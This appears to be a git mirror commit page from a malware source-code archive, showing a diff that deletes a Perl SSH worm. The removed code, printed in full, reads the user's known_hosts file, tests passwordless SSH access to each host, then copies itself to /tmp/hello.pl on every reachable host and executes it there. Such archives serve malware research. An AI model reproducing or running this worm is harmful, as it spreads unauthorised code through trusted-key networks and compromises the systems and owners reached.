mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
Delete Virus.Perl.SSHWorm
na
This commit is contained in:
parent
fd54e278b5
commit
8f5352451c
@ -1,56 +0,0 @@
|
|||||||
###############
|
|
||||||
|
|
||||||
##
|
|
||||||
# sshworm - example of a trusted host/key ssh worm
|
|
||||||
#
|
|
||||||
# This is extremely primitive and rarely works on anything
|
|
||||||
# but identical systems running the same versions of ssh.
|
|
||||||
# It does show how using unencrypted RSA keys for user auth
|
|
||||||
# across an enterprise can be a really bad thing. Eventually
|
|
||||||
# you should be able to let this guy go running as root on any
|
|
||||||
# given system, it will locate each user's known_hosts and
|
|
||||||
# attempt to gain accesss, reporting its path to a central system.
|
|
||||||
#
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
use FindBin qw{$Bin};
|
|
||||||
|
|
||||||
|
|
||||||
print ":: sshworm initialized at $Bin\n";
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
$options = " -o PasswordAuthentication=no ";
|
|
||||||
|
|
||||||
##
|
|
||||||
# stage 1 - attempt to connect to all hosts in known_hosts files
|
|
||||||
##
|
|
||||||
|
|
||||||
if (open (KH, "<" . $ENV{'HOME'} . "/.ssh/known_hosts"))
|
|
||||||
{
|
|
||||||
while ($line = <KH>)
|
|
||||||
{
|
|
||||||
($host, undef) = split(/\s+/,$line);
|
|
||||||
($host, undef) = split(/\,/,$host);
|
|
||||||
Propagate($host);
|
|
||||||
}
|
|
||||||
close (KH);
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
sub Propagate {
|
|
||||||
|
|
||||||
open (SSH, "ssh $options $host 'id' 2>/dev/null|");
|
|
||||||
while ($out = <SSH>)
|
|
||||||
{
|
|
||||||
if ($out =~ /uid/)
|
|
||||||
{
|
|
||||||
print ":: sshworm found new host $host\n";
|
|
||||||
system("scp $Bin/$0 $host:/tmp/hello.pl");
|
|
||||||
system("ssh $host 'perl /tmp/hello.pl'");
|
|
||||||
}
|
|
||||||
}
|
|
||||||
close (SSH);
|
|
||||||
}
|
|
||||||
|
|
Loading…
Reference in New Issue
Block a user